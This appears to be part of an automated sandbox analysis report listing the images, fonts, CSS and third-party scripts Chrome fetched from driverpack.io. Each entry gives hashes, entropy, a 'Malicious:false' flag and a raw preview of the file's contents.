...D.....a.p(../....r6.....0.f.2...R~...9.Yw........0L(......oTGX..rr.....'.3......&..rP.\.Qf6.\&..ZQN......$....Q...h-.....-)..............X5..r...............0J)_7..S.....=.aE-.t.N)..p.&....0+....i.{...p.r.5................PXT.U.C...4.....V..I..1.(cu?T....Z.U8..S-...C...`.Z..4.m..OS....7[..(.o.P....
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:downloaded
      Size (bytes):6066
      Entropy (8bit):7.956777343501186
      Encrypted:false
      SSDEEP:
      MD5:6191B0D2BE5BA6031AF1938A06C8FDA3
      SHA1:36932770EAC2BB691EE8EA8951B9D4A5192BD1AB
      SHA-256:85A92C8766DC7D247D43D3598E68D17D064AFF7E9881966074FBEDAD351D69CB
      SHA-512:8196CF219BD3F541AFF0C5F7ABAC195CCD79D7E26977F858A0EEA8F51696B988AE237F108D201ECF9D554EFC4F30D3BEC744439C9555A65E1E22A23501795681
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/pic/landing-feature-3.webp
      Preview:RIFF....WEBPVP8X...........q..ALPH.......m.0.......X..R.y.+.._.m..BB2. ..-f....Z.n..H.&u....$..3....&.:.......c_. ~..v......kDL.....9.A...x.+@..fJ'v.L].3.."..[.c.r...G..`..."b......:.W.....3.W......W.S...y.4K".Qeg......R./...i...G.?.c.X....{$9..\<..|]...]i.8....../=.|...k...k{._...............j!........j....&..|.....8...ku...-...uW.@...wx2..:?*.......g.._..b..wW...-..x.@...x..E.....Q...eYUu.m.4u]Ue..e...Q...'..(..u7..r....P..':...i^.|.c[..j..4..X...0.:.r_.b..........3..z.Yl..-"._&."`.A.iF.U]..-.sj^R.<.c....*kx..>...#.~.......9i=..6>x..S.......X'6rhq.`..6|....E......._.|...5.-...{.6pn4i.....c..r...cS......Mr.h.[6.~. )..Du.#...P..Bv....?..vX..q.6.6DN....A.....3...].x.*6..B.R.i....{6......C..x`c.m........f...:..?f.H..`i.c.2.]X.,...[..u...$....fa.h.4.3.B.@7H..........`9.X..D..v..p`.n...,..|..Me.4.8......j.q.`)w...,...Y..$....<...U..{_X;.w.*f......q&'.e.....,.....^....XD.K.W.JY..|. <N.S..{%..._.....D4.#P..Y2......8.K.(l...0.T(..P.".F .
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:dropped
      Size (bytes):3102
      Entropy (8bit):7.909298915952669
      Encrypted:false
      SSDEEP:
      MD5:3F6A8A8F0D8F1A61B820CF7DBA990D05
      SHA1:408833131510B928AAC270D5F319BC432CFCEE8C
      SHA-256:B75E3BAAC530515461B046B8191F5E6A7C77EDE2B6A7A35820092FF3EE3BA6F5
      SHA-512:5FB191DCF6DB2D8C5A68F0155A19EDEECF6743C4F56B3290F1C2399BED05DCBDD1B6BA6396D7DAE84DDBEDCF899073EAFD6A28C012CECAEBFB4FFB7B94F904CE
      Malicious:false
      Reputation:low
      Preview:RIFF....WEBPVP8X..............ALPH..............F..5.\.....+...r9G.*z_Zw...2.]6,j.......r.f.*_..._..g...^..1..........[;./D....K.;.........ZVy....U?).O.W.s.K.RN...f.ig..=&....5.E7.5n..qPs....c.G.<..<....+LEL"w...l..2k.UT6....IT#L..cz.%.6j.&.Y..l...[nZ.1.zh6......`.W...*.M.ai.e..r|!....z.u3Vz..#..b4.....r..jg..c-....N_.J1..hd..E...}H.@3@..\.4.....(..=Fy......;$m3....l..].a".5..b.......,.Pz..c.H.I..[&$p...%....R......1F4l..0......H.................j..M..M`......I.Y.'$F@..d.3.&P.5....i.E.....L0F.W.c.Csd.qA.E<...H..s..)|..M..JnD...Uj.9".l...J......3lVA.O.&0...7....@}......s.....+x1Q...*....*TC.G...4VSys<..y......h.....`'.e"+...q...C...(..:....RN..3.}...&z.R.$p..d".."D.].D.c.E(o..5B`.].K......"-.Ss..N.L...Y..I.{..M*'.&...<.....~....,....@.3@..).T?..$.l?.X......a....R.y*.......&p.(,.+VL.xv&.;.0s.(.@........(1.....LB4P~.x.P...q.`...].&....P...2.~.k\5.Q.8....E....2....%.,...c7...I....$.......[..6.oN0......{?.nJ.y...g..0.:j.p.t...v.x.Usw.r+.......].....l.;%.P..
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:dropped
      Size (bytes):2262
      Entropy (8bit):7.913119664075687
      Encrypted:false
      SSDEEP:
      MD5:6435D62E45B6748EE1A6174E42F89CD4
      SHA1:0573DC659C52488DEA97A8D3DC2889EE5EB50253
      SHA-256:F38D825617873EBD9032BC714A999468DAE3BD79105E3B3EAC4CD82F78F5BCF1
      SHA-512:A90EDD7CD2230BDAB3CAC733B15223747A782AA9CF0C7DE8C0FC5138EBE6E3C5D7847ADC0D874C320E7B3A73CAE6F06E29BBED6B1B4D0CE6E6F895D6A07C7C06
      Malicious:false
      Reputation:low
      Preview:RIFF....WEBPVP8X...........m..ALPH..........l.}.......B1:.d...7.....62.H.....8.d...&..Fa..|....\u....D...;.5Z.5.s>3._.T....U.m....$.m....$_..nH..n..d.....z...p..MI&f.....<.M....d../.t....^..dh..=.:s.G.a$-...>..,..l...$K....(.-.e.`.%..cE6.Q....h.E.....&.ud..]..-.kK26.9._Tp.$7..^.<.(....AE.Z...$Y.Fa..Y...$...X.d..,..stb.%u.#.........^...<Epiq;M..:.-......W...+...$M..S.}c>.....a..b[..... ..d..C.........z....N..a.[...l...jwGO.........v....t.S....K.j.....r3......p....p[.....d.5.........@:.....cE.[..V.uk).0..W..bo.+.v..I.u..p.HW.<K#.;).......c.kK.e....F(.?.2......K:.)%W.K.H.i..5..G....?~|Y.ZH)....b,mz.....V.vv..u/Pn%....B;.f.Xp.G.c...3...h..u.PV........Y.....3S....RjJ3.`J#.o..W...R...h=.:.....J.1|....!U.Eh@.W......L.,F......K..l..~.....t.c......Y..j.@...'.^=...R...N*.C...B.6#....h.].g...:[.u..w..u..P....\...J....zN+...Zr.F...K..6....b.d...p...%.no.B..>>...F...L.Z8.nN%0.(..Cm.^.Q......YSL.L...r.......e..K....GG.vB....x.H....{.1Y..
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:MS Windows icon resource - 1 icon, -123x-123, 32 bits/pixel
      Category:dropped
      Size (bytes):73478
      Entropy (8bit):2.7722874845685035
      Encrypted:false
      SSDEEP:
      MD5:6D0F77AAC2079DCDFB05EEA5D73ED526
      SHA1:4599B12B4EEA2211A64D61EBE2BDCBDFC7AECA60
      SHA-256:1F83D6413A64A5B827618170E3D04801ECC8196699A2F298393E1711F722D97F
      SHA-512:25B134C28144F0E3212BC7A959FB51DDCC762E7E268AD7E70430E7E41881665E05BA9C318C1CBBE7B1C99ED5892AA7A9B3FFF426DF9D178975BAE3D26CAE1674
      Malicious:false
      Reputation:low
      Preview:............ .........(............. .....d..........................................................................................................................................................................................................................................@...`...............................................................................................p...@...........................................................................................................................................................................................................................................................................................................................................................................................................................P.......................................................................................................................................P......................................................................
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with very long lines (12331)
      Category:downloaded
      Size (bytes):12332
      Entropy (8bit):5.0916439525688215
      Encrypted:false
      SSDEEP:
      MD5:88A769D2FE35899FD45A332A0A032CC0
      SHA1:514C6C1D8475D17E412849A4C90159517D0FA10A
      SHA-256:CCF00D1923B0131A10E0C6D26F95E5DEE6EBF8621A27E83C5A2F68A2E0093142
      SHA-512:756CC5CD029FC4ADC9100D0DA2F2B0EFB3DF0F2BF894FBA2824019832FEA594EDD40A238A5FFACC205572CC0155F5632D70F54E37EDC0772460F44C69CB76AB8
      Malicious:false
      Reputation:low
      URL:https://driverpack.io/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js
      Preview:!function(){"use strict";function t(){return"cf-marker-"+Math.random().toString().slice(2)}function e(){for(var t=[],e=0;e<arguments.length;e++)t[e]=arguments[e];(n=console.warn||console.log).call.apply(n,[console,"[ROCKET LOADER] "].concat(t));var n}function n(t,e){var n=e.parentNode;n&&h(t,n,e)}function r(t,e){h(t,e,e.childNodes[0])}function o(t){var e=t.parentNode;e&&e.removeChild(t)}function i(t){var e=t.namespaceURI===A?"xlink:href":"src";return t.getAttribute(e)}function a(t,e){var n=t.type.substr(e.length);return!(n&&!E[n.trim()])&&((!k||!t.hasAttribute("nomodule"))&&!(!k&&"module"===n))}function c(t){return a(t,"")}function s(t,e){return function(n){if(e(),t)return t.call(this,n)}}function u(t,e){t.onload=s(t.onload,e),t.onerror=s(t.onerror,e)}function p(t){var e=document.createElementNS(t.namespaceURI,"script");e.async=t.hasAttribute("async"),e.textContent=t.textContent;for(var n=0;n<t.attributes.length;n++){var r=t.attributes[n];try{r.namespaceURI?e.setAttributeNS(r.namespace
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
      Category:downloaded
      Size (bytes):226430
      Entropy (8bit):5.317177806517411
      Encrypted:false
      SSDEEP:
      MD5:A971257F6BA54B6E8C0C7856BE1DE963
      SHA1:929AF25A293303E6229CA5C97FE05833D03C0A70
      SHA-256:D0A5D0BC04DA9B2D57927C0C59E2BD9E68B58934B4574E3E6EB5C5F325C618BF
      SHA-512:2E5846142497BBA0AA75F4EF0A4B02F91B8F4574BC474234CD264F13E8D5B641395C8DCA1980AA2E36E15B3FFDA7D3C3073DCE63613E1CCD002EDB3FA100B5FF
      Malicious:false
      Reputation:low
      URL:https://driverpack.io/build/main.4f8b1f6d1efea490a16b.css
      Preview:.AdminCackle__wrapper{padding:50px 0 30px;background-color:#fff}.AdminCackle__wrapper .cr.mc-c .mc-breakdwn,.AdminCackle__wrapper .cr.mc-c .mc-menu.mc-grid,.AdminCackle__wrapper .cr.mc-c .mc-rate .mc-star-text .mc-rating{display:none!important}.AdminDriverpacks__wrapper{padding:0 0 40px;background-color:#fff}.AdminDriverpacks__packs-wrapper{width:100%;max-width:1105px;height:515px;margin:60px auto 0;overflow:auto;font-family:Ubuntu,Segoe,Calibri,Arial,sans-serif;font-weight:300}.AdminDriverpacks__pack{padding:16px 0 17px 20px;font-size:18px;line-height:1.8em;color:#7f7f7f}.AdminDriverpacks__pack:nth-child(odd){background-color:#f7f7f7}.AdminDriverpacks__pack .AdminLandingPage__blue-btn{line-height:28px}.AdminDriverpacks__pack-title{width:39%;color:#191816;font-family:Ubuntu,Segoe,Calibri,Arial,sans-serif;font-weight:700}@media(max-width:600px){.AdminDriverpacks__pack-title{width:50%;overflow:hidden;text-overflow:ellipsis}}.AdminDriverpacks__pack-version{margin-left:5px;color:#0c71b7;te
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:Unicode text, UTF-8 text, with very long lines (9262)
      Category:downloaded
      Size (bytes):248805
      Entropy (8bit):5.5972156860806335
      Encrypted:false
      SSDEEP:
      MD5:F299DA7A39B23C4A886C43898FDB5B8F
      SHA1:8D2A3C10D7E7261CC4547278274B61CEF3D4D789
      SHA-256:8390F939B3C45D1969E4CE868DDA3E4013E89EA4576BEDBA585A7B9F4B008D40
      SHA-512:FB70F4975586CF241E19FE9B045E59AB56521401DC564CFF256908E6CB2E0BDCC9DCEDBEBABBA7599B208E33858C42E9CBBB87332EE11B6B6F3D21219AB78A41
      Malicious:false
      Reputation:low
      URL:https://www.googletagmanager.com/gtag/js?id=G-2P3CJS37L7&cx=c&_slc=1
      Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"vtp_signal":2,"function":"__c","vtp_value":2},{"function":"__c","vtp_value":"google.co.uk"},{"function":"__c","vtp_value":0},{"vtp_signal":2,"function":"__c","vtp_value":2},{"function":"__c","vtp_value":"google.co.uk"},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":16,"vtp_value":true,"tag_id":16},{"function":"__ogt_referral_exclusion","priority":16,"vtp_includeConditions":["list","drp\\.su"],"tag_id":18},{"function":"__ogt_session_timeout","priority":16,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":19},{"function":"__ogt_1p_data_v2","priority":16,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_autoEmailEnabled":true,"vtp_autoPhoneEnabled":false,"vtp_autoAddressEnabled":false,"vtp_isAutoCollectPiiEnabledFlag":false,"ta
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 318x174, Scaling: [none]x[none], YUV color, decoders should clamp
      Category:downloaded
      Size (bytes):1170
      Entropy (8bit):7.815652935781301
      Encrypted:false
      SSDEEP:
      MD5:DD20E458F733CBB41F0C8C74FC94FDB2
      SHA1:B28487B6EA59E119334C29DA5361F1158E4BF157
      SHA-256:2E0302BBB8B70F7B66B470831C48C8D4F18B6FF41F28F0820B8DFFB0C261E6B0
      SHA-512:35F1C3A996B316F653DE4F556B88B6A809F6149DB2F9DF5E440863457585A62E8B431D817EB50D9B78425224227D86261068785CE9179273FADAF96418EE652A
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/pic/vendors/acer.webp
      Preview:RIFF....WEBPVP8 ~...0(...*>...>.h.P.&....h....cn.uP...N.`..7...kB.ow......vk..:..T...eU.d.^... ..\.V..C..:....e*....O-.."i..).V,......%eU.u7F.Kz....c@.....!M....+..*].*.{'?pZ}G..Q..$..T>.(./.....p!y.m.JC./.=.ZB.J.#...At.+r...|.J.JH..!....7..0..o.cS.'....8..]...9q>c.s._..C..h4...|..S.7y...@. ..B.4.@.0..q.....*.. .J...vYU`...P.w..........o...k..`..L_...v.-..h...v.-.t...]....".C$ .....Gf..g..f4t.!...f.oI.95..6../:v..s..2*3\@..7gQ.j4.M.RM...#>.t...W..A..H=..Vj...t.....=.{...d6).G..X....|....o....z'7.........RL..O...~mH..e.D1.aB.f...0?....F....D...t:l..xE..~.6O.f.G.T.6......;..=.<.+....jq..S.....A.iYIW.p!....z..=...]..y.)....T....BW...`.C.'h#.|.."..y..h..kk.@.....o.@8.......xI.;"R?...{.N...0...x.N..T...{..R.c...]..b.dX..3..E-$..l.j...@.$aF...4...t.ya..o.#9.Y.....(.e....cn..H..i.o...C......F...X$.7i.[,.C.s...p.5...:....+...."dPgPP=.:UW' .p...Zt...+|$.Nm{c..I3-......<...s.8..E..........>?~.P......Or.h.^........%XFR..m..;..~+&.k..~H.D..k.
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:dropped
      Size (bytes):2292
      Entropy (8bit):7.900614720686856
      Encrypted:false
      SSDEEP:
      MD5:A6C998108232A90BBEB78DB91F6F76CA
      SHA1:0375EFBC3899BB9E5E7CF8B2685901D9CF117CD3
      SHA-256:C16B91D73633DA69FB45324CE558BCF611E7A6B0137FAAE4D81D7AA8143C2440
      SHA-512:9CDCF64A088ED3BBC02FDC1F6D52DDCF790D6007DBFACC87174020F5E393795D0B9103CF475FE3D9D58C4E906B992127A40A5177A2550A036D613959D2E7D989
      Malicious:false
      Reputation:low
      Preview:RIFF....WEBPVP8X..............ALPH............1..3...h.Q.....N...gv&....2...X(&.3...`:.\".`...?....k..h.1.0.....SY.m.uU..].S.......w..~.o....Ev..P^..k.0-{b.ih. ....$...:K.T.W..f.....3.GI.."4[t"C."s.%....)8.a..<"..]".3...os...2..7F.....".dt.....2...n...X.T..e......fr$..'.x%.T...AE...~.&..SvAM...f^EV.<V..,]N..#.Z....,..I..).....Y.-Y.....Y.".K..`:Z,...x$.....?..!.G....9.6o.^....o..7.h>..is?..>..<./.K..M....m..........N.z%.8......]0.4l...;.U:P1PL..6.O.I.h>L.{....2HD...y..h..7......i....S0w....jGn]..?.+.f...4t*vr..'...\.....1..=pb..}"...v.OoI.~..a.....;3.&...mM.....@.....Hfk.;..H.<. g'.'.!.wW.=.....%....e....H........*9'..qUP...Y..F.(......J.}..QI.....f..3.5;..-..M(x.8o*+vD.{.7....4n..A......L5R......'..u..xoA#.T.......i... ...M%.G.|..".....NT.:$.{].F*..v.W..Pit(..&...3....'....hA>.....W=".'..A..I.O@f.....M2`g....s.4...u.5...>..R.'.....`...z.J...X..m.T.....%me....r.O..7..B..-.[A...:[..oz.....6-P[..Z.o@e.....&.P.'.6.uz..I?j.6.I..P..J..s....L@.$r....L.
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:downloaded
      Size (bytes):1506
      Entropy (8bit):7.827113329242513
      Encrypted:false
      SSDEEP:
      MD5:FD1A6D916B564B1F7B372549C8B2E945
      SHA1:AA2951B0B37DDA3E10B03A8A41CF693530AFC777
      SHA-256:4CEF9F5014522F500D17D145260E941818676772E638BAA3B9F640DCAC15A525
      SHA-512:25254013E5C890B8D58BD0E886AEBAAFC54B53A709F5958ADE66B536899F1CE104B829A2868995173EAC7A2E85BFD487E88BF15E01183E2C50290601B0DA172C
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/pic/publishers/pcmag.webp
      Preview:RIFF....WEBPVP8X........d.....ALPH<....'@ i.......<+.E.....j-p..._..{.#.?.f..$.(&.&.+..[Q...b..l.VP8 x........*e...>.`.P(%#...K....j..xg..1.`......W.?....b.\.g}. z.y.z.~.{....i..|6.w...o.c..c..oL..ME..3.&..B.Z....i;e...z.k..U2....~p.S...}6Wh'D.|..iV.ki.B......&......Z..LU.....f.gD:0W\......<?.P..4.G:3J.Yb.:...f.>_...#N.....f.D.Su<....1.....Q.n.8SD*r[....'...}3GB....8......Y.;.k....N...E.....rcF..-.r..O./.....&.....0.M.v~f.y.~q.a...}r.z.u...,.b.... e...cj..y..`M.....g=./t....<.... X....j..>.m.B.... ...M......<Y.T. W..y.'.B.....{.#$x.b......5..D.....c..H.iF.qk...........-v./i..$..d%]O...m._.....O.;.H...V..i.e...I..I;....8P...!..N...}.[...i<....<.....U.c5.p4.%.a.di......;......F.Q..kZd..R....<.z...L..y...$.*I.:.... i...S-.....`M.I......9..1......H.+....f.+.P.>\.......@...y......H$...`..A....Hz.}..E.L*9.ky.ua3cb..~c..._........sG......".pNsV..m.l..z.!Jt./..m.F.`(~....LA.M....b....M"zt()....P...kL.H.....;...\..5:g......8d......f+|{'C..aV..7..g
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:PNG image data, 199 x 428, 8-bit colormap, non-interlaced
      Category:dropped
      Size (bytes):1391
      Entropy (8bit):7.1139595793221675
      Encrypted:false
      SSDEEP:
      MD5:C31BA518BCD6D711D039E05A1D4615B0
      SHA1:52D732ED2550870A2368B2FC0FB4BD53E61EA090
      SHA-256:438336B54CEF6429AD60EDB14F959E0B5B8BEE9F119B398126D46231A137F0B6
      SHA-512:6A22E0D388ECD92643275765814CF540E43822A1D3AFFF7C415E7C98D259615750D7DDC61B29E2A5E43AF5554DAD24930A22E8C4894545F40D1117BBAE371726
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............^.C.....PLTE............................................................................................................................................................. .d...4tRNS................................ !"#$%&'()*+,-./0123$.0"...NIDATx^..[o.X.F.m.M. &M..$4.B..`......|j5..4.k.Oz...ua.|`..2e..0M...!.......b...!.9c2.!.......4.....I..6...)..c..C.3"$2.C.3B.^.a....................3.{.1..}.2Z)B.3".>.{.....M}.t...t.R....q..m.nd.zx..!...F.>.=#B.3B.......U....... ..W?...o.4.....B.<2...e.yd....b..!z....}dX..HZ.gt]...gH..}H.....i.p.`...XGF...v|i.U,.....U..O........?.._..#..Y+I..<..P.}......j|V...;v...c....g....k..=2....z.[C.o..6.t.....m6w.OgD..DF...=....4.!...."...o...6.B.q..Q.cV.d....!........"1............a..^d.>....Z.n.pq.U.k.(.._|;..S5...V..v.;i^....A..u^..o.3<.E}f|.ov.....z.....Kj..VHWXv,%..\<.nMTL....8..S.?.yQ>,+.|.R9H3.d.r#.~.Q'.|;.y.......(.NS|NL.7..=3.!.`...01............C.J:...........Cns. .Kzq..HjR..I]i.1.v:<.o.....
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1020x629, Scaling: [none]x[none], YUV color, decoders should clamp
      Category:dropped
      Size (bytes):17362
      Entropy (8bit):7.984179991681572
      Encrypted:false
      SSDEEP:
      MD5:CABD6983AC7DBEA39E0BD0820AFE7A8E
      SHA1:B456C8E0C1A15EC2DB17A1468982EE050B3203BC
      SHA-256:00D092B6F8318519562CFD75362ECE755ADDDE34E29C0A420D3539336E8D49F7
      SHA-512:1B1485E5653F09697B15C5F03544C101889680B78E76A94E49B452C75F274B364098D1FB308FE92D9B11326F3057E21C71787DD486CA9D5F5AD3706FB7096C8D
      Malicious:false
      Reputation:low
      Preview:RIFF.C..WEBPVP8 .C..P....*..u.>.h.Q.&.'.Ryq...in...3.....0..S.............>a.k.W..~...u+.*...........?...~..O./..V~.....3...............:..9..1.......z..w.../...."..........._.}.t..O...!K.'H...0......*3.i.....W.....V.....eU.}..xYU`.."u.....3.06QsE)..KD.t......bb.b...:m...`..q........x...>..<,........T..G....]~.5fV...G.V....Y.kc\Iq.B....~/.L#.c9.&.H...$...s.~m.a....q6.D}.!..F.'.@zJ.U...X......]....B..D".G.Q./..~.......G.Q./...V.....d..j.....fx...}.'...w.....J`......X..@.H.......(......d.}%7oFw.W...m.>.].Zq.......s...y..a..&.:....\....V..y6H.y..k].....d....uK.u.Vh.$/.m.....-.. .i,.......@..x....J..-.0..(..J-.$..{.p2.........x.......<w.H... .....I:..|.Y....e.XZ.Hy.....J.l.7.j..^..B&T..#K..m.........8.h.B.R..o....D..4.$6{6H....<,..a.]...6/....V;/!..\.P.`.J+..4.."e......AcW.h....6=..wK.L...6.j.c..I.~.zQ4).^.u.d[.9...G.;4.pij.F...4..I.@Mt...#.&?.......&u.'.J..,....Q...8.e.5|./X.~..f3mJ.....p.T..5.....=...j....a.J...%?P.m.....n..&....]..<J.J.D
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 318x174, Scaling: [none]x[none], YUV color, decoders should clamp
      Category:dropped
      Size (bytes):1320
      Entropy (8bit):7.814786217963984
      Encrypted:false
      SSDEEP:
      MD5:1CDEC6377CAF2CBC0353AE1B725FF9A4
      SHA1:E42A37DCBF70C0B869039386B62FA03DBCC6EB01
      SHA-256:677AAAC17254088F35084B4849DA825E696A0A8D196218302D15C84FD791D3C9
      SHA-512:D2DDC80F2A99850722734F52D0FFAA528FD035174C6C80BE0D5387FEF575E5BC8A3DCC7D304D1E76C9EC57C6D60F6EE92162D41617B5C2C9D0B8F2B0B603D4BD
      Malicious:false
      Reputation:low
      Preview:RIFF ...WEBPVP8 ....P&...*>...>.h.Q(&$....1...gn.s.l|........L.8..i.f.....D[)3.....L.DE..V...Ri{:/..l..U.8i ..h.0.y....|..-...v.}\t9.Y.}....[I. .YO.+....jT.QU.(.......!.....F................n..S..n.....a..r@./g.nK...F..S!....Q./..g..L....$f..VD-7yk...M..z....}f..f-..p?.v..;...R...0..O.fx...h..8.:......`D...t_.".I......La..+Vn..J..KB}./.U...V1..'....Q.Ac.D.V.....X.0.......R...z...J.m.../f..b.. ...G..7....Fbr.".1..P.Q.Mu+.Y.).D...U...p.g...!..<Sg.C.e..9...Z4=.AQ.N.k.}......r.Z...j\.b....qG<.pE;=.]..i7...TN.&....n7j..#R..].h.b...._........}..:..v...zO.p.5..h..r#.[..i.c....:..8...\D.rWQ'.g....M...D}\P-/...tO.9..... ..y..|..X]3..T.l..b.i......t..........[...R9k...`}..M2p]6.z.t.q.z.....T..k.K..vF/..?.).fB..1.........t..x...$....}..Y...=.....A...%w.Z.8.Dl..s..X]..@...=.y.9..+.&.(..4.O.?Ew..q.}................8.1 X8....W).k.P...g...~..Lh.:).XW..].K:N.N...rV&...g..g..p......M".O.m...C...'^b.)x.i...u......!..............y._..1..?..Gn.E..0.w..;.
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:Web Open Font Format (Version 2), TrueType, length 29752, version 1.0
      Category:downloaded
      Size (bytes):29752
      Entropy (8bit):7.991445623989535
      Encrypted:true
      SSDEEP:
      MD5:AB1FC8621287E4EA9319A3136812CF80
      SHA1:FB4ED2E52E2A8D7AC50A7618A0C2EA5507A24EF3
      SHA-256:7C00752CE82D6ABAED0B9766D35B906B16675FACDBE24115B410D1FAB975EFFA
      SHA-512:B1EE9B00D9C8305521662756E6E1589F955491E5887C94C0A49D8FD41D0038CD42F929A0AB12F5FD44FEEF4DE296A6A43A6CA90767DF886FFF89BFEDA70DFBD7
      Malicious:false
      Reputation:low
      URL:https://fonts.gstatic.com/s/ubuntu/v20/4iCv6KVjbNBYlgoCxCvjsGyN.woff2
      Preview:wOF2......t8..........s...............................2.`..V........#........5..,...(.6.$..T. ..^..X...[..q'dG.%..w.."@.}.oQ.n..QL.}.Z.7Fk...i..$....ON.c.....U.z.....l.Y...@A+....d.5/FG....f.S...*..G.}.&......p5..l.PT..............!f...2.g.......E.*.I..HO.T..m....W.;k.....B.%.T..U_..l..:..k..2N.r.Q.!..m.,\2...!...Ek.$...fA."_.......Fv`.;.._..n..Z.;P..V.=.9.9....G...]..........xYY.le.....jV...bx....c.mT.& .&..b4........~..........U]...3..t#......T.......h......My......i..)...)Z..5s....'i.....q7.+Y.Z.g<.xCp...=;+.9P..~...).d..$....n).g.@...G..9..|~......`...._..1..U....{..K.......WpRD.-. .W.(.............i.......L:........).m.0...y..&.0...J...K#.|q...p...2..!.'.C.>..rQ......1.-S...\...?.V.....).I.3...%...6.....b5@.li".G... &R..J..Q3{a.......U....g....B.D7.r....a.6.z.%.G...R.t.o........V&...R...ya.R.-y....-..RW..s`..A.$}....$.O.tO... .r.{`..t.i?....?...yFK.#.W.2.|."".J....W....xI$..H...=.Y.S..._..n.=.....T..Mx<.Z..gS.BW...e....(*...
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with very long lines (3916)
      Category:downloaded
      Size (bytes):148622
      Entropy (8bit):5.601422324204024
      Encrypted:false
      SSDEEP:
      MD5:E4E7EE477973294DBB27DCF746F04176
      SHA1:BB51BCF919EE9C5E43E9B13E01EE18220393DDD5
      SHA-256:95AE9FADB392B1AD6F238EA57DCEB7330064C847409B6EC122E765D8CEA93F0B
      SHA-512:E97B50244330DF224E1FEBF6D1EC9FB1199BBDE50D0A35686C3DD73A6F5C8B2962D2B3696AC724565951CF799C8AED22D167ECDEAD50D56DF2014100A6CA8C22
      Malicious:false
      Reputation:low
      URL:https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js
      Preview:(function(sttc){/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .'use strict';var aa={},n=this||self;function ba(a){a=a.split(".");for(var b=n,c=0;c<a.length;c++)if(b=b[a[c]],null==b)return null;return b}function ca(a){var b=typeof a;return"object"!=b?b:a?Array.isArray(a)?"array":b:"null"}function da(a){var b=ca(a);return"array"==b||"object"==b&&"number"==typeof a.length}function ea(a){var b=typeof a;return"object"==b&&null!=a||"function"==b}function fa(a){return Object.prototype.hasOwnProperty.call(a,ha)&&a[ha]||(a[ha]=++ia)} .var ha="closure_uid_"+(1E9*Math.random()>>>0),ia=0;function ja(a,b,c){return a.call.apply(a.bind,arguments)}function la(a,b,c){if(!a)throw Error();if(2<arguments.length){var d=Array.prototype.slice.call(arguments,2);return function(){var e=Array.prototype.slice.call(arguments);Array.prototype.unshift.apply(e,d);return a.apply(b,e)}}return function(){return a.apply(b,arguments)}} .function ma(a,b,c){ma=Function.prototype.bi
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 318x174, Scaling: [none]x[none], YUV color, decoders should clamp
      Category:downloaded
      Size (bytes):1352
      Entropy (8bit):7.848469513941109
      Encrypted:false
      SSDEEP:
      MD5:A9E39F46D44ED06B784AB7D80A983E3A
      SHA1:85C57CCB73F13933BCDA8E30C2AC31799AA541C6
      SHA-256:71FCA28808D8FA07152E016936FC6B68DE7BBB1CC889DE28D685708E84F90A4B
      SHA-512:6F89E1314BF333865E714B7F4FD1F3E61E76B5FD90CDD44E76EE9F96965E91EED9EA21A0E47F79132DD8476A17E336E8E8BEE82C7FB0072F8B7FBC1868CBC9E9
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/pic/vendors/hp.webp
      Preview:RIFF@...WEBPVP8 4....+...*>...>.h.Q(&."..8....cn.s@..z..[.......^..?...l.....3....@.k^.w.a.}.........m..^sg..;.....DLI.s.M....x.....H~....M.Uk...l...&.f.K.h.imi..<.v..m.vvm.w8...UL....]a.P.e...../k.......cN+mke.Z. ...n.,N.[40[...N.p.`r.g..p7..{........ze.O[:j..#8..A.v.[X..^.(i...b.Zj)......-.....v*...+.......S....5.^....\o.o..f...y..;..~'..{e.6q......o..!`e...M.. ...9iiiiiiiiiiiiiid7Bp......zr.X^>AKh......=o0..h....x.....9'.i.I.h...#u..{.n2.~..0.....L......d.cp.$..k.,*..Tg....0.2..$ ..,..~..&.qJ)...o.E.M.~..=....u......eR...Y.....;...D.U......Q.R5.~.P..[...C..e..}5.......=.[....4...Tu:.......]|Z.k..a...`[.`-.._.%.}...[...+ v]Q...X,...j).].....{....ua.e...".83.^.......j.^... 